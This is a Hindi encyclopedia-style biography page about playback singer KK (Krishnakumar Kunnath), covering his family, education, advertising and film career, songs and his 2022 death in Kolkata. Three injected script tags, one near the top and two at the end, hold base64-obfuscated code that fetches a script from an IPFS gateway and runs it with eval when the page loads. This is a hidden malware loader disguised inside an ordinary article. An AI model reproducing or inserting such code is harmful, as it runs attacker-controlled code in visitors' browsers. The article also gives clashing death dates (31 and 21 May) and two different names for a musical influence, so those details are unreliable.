के. के. (गायक)

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
के. के. (गायक)
कृष्णकुमार कुन्नथ
पूरा नाम कृष्णकुमार कुन्नथ
प्रसिद्ध नाम केके
जन्म 23 अगस्त, 1968
जन्म भूमि केरल
मृत्यु 31 मई, 2022
मृत्यु स्थान कोलकाता
अभिभावक माता- कनाकवाल्ली

पिता- सी. एस. नायर

पति/पत्नी ज्योति
संतान पुत्र- नकुल

पुत्री- तमारा

कर्म भूमि भारत
कर्म-क्षेत्र भारतीय सिनेमा
शिक्षा वाणिज्य स्नातक
विद्यालय माउंट सेंट मैरी स्कूल, दिल्ली

किरोरी मल कॉलेज, दिल्ली

प्रसिद्धि पार्श्वगायक
नागरिकता भारतीय
अन्य जानकारी साल 1999 में सोनी म्यूजिक लॉन्च हुआ तो वे एक नए गायक को लॉन्च करना चाहते थे। इसके लिए केके को चयनित किया गया। उस दौरान उन्होंने 'पल' नमक एक सोलो एल्बम निकाला, जिसके संगीत निर्देशक लेस्ली लेविस थे।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>कृष्णकुमार कुन्नथ (अंग्रेज़ी: Krishnakumar Kunnath, जन्म- 23 अगस्त, 1968, केरल; मृत्यु- 31 मई, 2022, कोलकाता) प्रसिद्ध भारतीय पार्श्वगायक थे। उन्हें उनके संक्षिप्त नाम 'केके' से अधिक जाना जाता था। वह हिंदी, तेलुगु, मलयालम, कन्नड़ और तमिल फिल्मों में प्रमुख गायक रहे। केके ने अपने दोस्तों के साथ एक रॉक बैंड का भी गठन किया था। मशहूर गायक किशोर कुमार और संगीत निर्देशक आर. डी. प्रधान ने केके को बहुत प्रभावित किया था। विख्यात फिल्म निर्देशक विशाल भरद्वाज ने केके को बॉलीवुड में गाने का पहला मौका दिया था। उन्होंने बॉलीवुड में अपना कार्यकाल फ़िल्म 'माचिस' के 'छोड़ आये हम वो गलियाँ' से शुरू किया। केके 31 मई, 2022 की आधी रात को कोलकाता के नजरुल मंच पर परफॉर्म कर रहे थे कि अचानक उनकी तबीयत बिगड़ी और कुछ ही पलों में उनकी मौत हो गई।

परिचय

कृष्णकुमार कुन्नथ उर्फ़ केके का जन्म 23 अगस्त, 1968 को केरल में हुआ था। उनके पिता का नाम सी. एस. नायर और माता का कनाकवाल्ली है। हिंदी सिनेमा में एंट्री लेने से पहले ही केके करीबन 35000 ऐड जिंगल्स कर चुके थे। उन्होंने 1999 क्रिकेट विश्व कप के दौरान भारतीय क्रिकेट टीम के समर्थन के लिए 'जोश ऑफ़ इंडिया' गाना गाया। इसके बाद उन्होंने 'पल' नामक एलबम निकाला जिसे सर्वश्रेष्ठ सोलो एल्बम के लिए स्टार स्क्रीन पुरस्कार मिला। इस एल्बम के दो गाने 'पल' और 'यारों' काफी लोकप्रिय थे।[1]

शिक्षा

केके का पूरा बचपन दिल्ली में बीता। उन्होंने दिल्ली के माउंट सेंट मैरी स्कूल शुरुआती शिक्षा पूरी की। उन्होंने अपनी ग्रेजुएशन दिल्ली विश्वविद्यालय के करोड़ीमल कॉलेज से पूरी की थी।

विवाह

साल 1991 में उन्होंने अपनी बचपन की दोस्त ज्योति से शादी रचाई। केके एक बहुत ही जिम्मेदार व्यक्ति थे। जब भी उनके पास वक्त होता वो वह अपने परिवार के साथ रहते थे। एक इंटरव्यू के दौरान केके ने कहा था, "मेरा परिवार ही मेरी ताकत है, वो मुझे हर कजोरी से लड़ने की ताकत देता है।" उनके एक बेटा और बेटी हैं। उनका बीटा नकुल जिसने एल्बम 'हमसफ़र' में एक गीत मस्ती गाया है। केके की एक बेटी भी है जिसका नाम तामारा है।

कॅरियर

केके

केके कभी भी एक गायक नहीं बनना चाहते थे, उनका बचपन से सपना डॉक्टर बनने का था। केके किशोर कुमार, आर. डी. बर्मन को अपना गुरु मानते थे और उन्हीं को ध्यान में रखकर संगीत को अपना कॅरियर बनाया। कॉलेज के दिनों के दौरान उन्होंने अपने दोस्त के साथ मिलकर एक बैंड किया था। केके को पहला ब्रेक यूटीवी ने दिया था। उन चार सैलून की अवधि में केके ने 11 भारतीय भाषाओं में 3,500 से अधिक विज्ञापनों में काम किया। केके लेस्ली लेविस को अपना गुरु मानते थे, क्योंकि, उन्होंने ही केके को पहली बार विज्ञापन में गाने का मौका दिया था। केके ने हिंदी में 250 से भी अधिक गाने गाये एवं तमिल और तेलुगु में 50 से भी अधिक गाने गाये।

विख्यात फिल्म निर्देशक विशाल भरद्वाज ने केके को बॉलीवुड में गाने का पहला मौका दिया। उन्होंने बॉलीवुड में अपना कार्यकाल फ़िल्म 'माचिस' के 'छोड़ आये हम' से शुरू किया और आगे चलकर कई और लोकप्रिय गाने गाये। उन्हें अपना पहला सोलो गाना भी विशाल भरद्वाज ने ही दिया। पर यह 'हम दिल दे चुके सनम' के 'तड़प तड़प के' में उनका भावपूर्ण गायन ही था जिससे उन्हें प्रसिद्धि मिली।[1]

टीवी कॅरियर

साल 1999 में सोनी म्यूजिक लॉन्च हुआ तो वे एक नए गायक को लॉन्च करना चाहते थे। इस काम के लिए केके को चयनित किया गया। उस दौरान उन्होंने 'पल' नमक एक सोलो एल्बम निकाला जिसके संगीत निर्देशक लेस्ली लेविस थे। उनका दूसरा एल्बम 'हमसफ़र' 24 जनवरी 2008 को रिलीज किया गया। केके सिंगिंग बेस्ड शो फेम गुरुकुल में बतौर जज नज़र आ चुके थे। हालंकि वह इसके बाद दुबारा छोटे शो में नज़र नहीं आये। उनका कहना था कि यह माध्यम उन्हें प्रतिबंधित रखती है।

प्रसिद्ध गाने

पल, तड़प-तड़प के इस दिल से, सच कह रहा है दीवाना, आवारापन बंजारापन, आशाएं, तू ही मेरी शब है, क्या मुझे प्यार है, लबों को, जरा सा, खुदा जानें, दिल इबादत, है जूनून, जिंदगी दो पल की, मै क्या हूँ, हां तू है, अभी-अभी, तुझे सोचता हूँ, इंडिया वाले, तो जो मिला।

मृत्यु

गायक केके की मृत्यु 21 मई, 2022 को कोलकाता, पश्चिम बंगाल में हुई। एक कॉलेज द्वारा दक्षिण कोलकाता स्थित नजरुल मंच में एक समारोह का आयोजन किया गया था। जहाँ करीब एक घंटे तक गाने के बाद जब केके वापस अपने होटल पहुंचे तो वह अस्वस्थ महसूस कर रहे थे। उनको दक्षिण कोलकाता के एक निजी अस्पताल ले जाया गया, जहां डॉक्टरों ने उन्हें मृत घोषित कर दिया। अस्पताल के एक वरिष्ठ अधिकारी का कहना था कि 'केके को रात करीब 10 बजे अस्पताल लाया गया। यह दुर्भाग्यपूर्ण है कि हम उनका उपचार नहीं कर सके।' अस्पताल के चिकित्सकों ने कहा कि उन्हें आशंका है कि गायक की मौत हार्ट अटैक के कारण हुई थी।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 के.के. की जीवनी (हिंदी) thepublic.in। अभिगमन तिथि: 01 जून, 2022।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>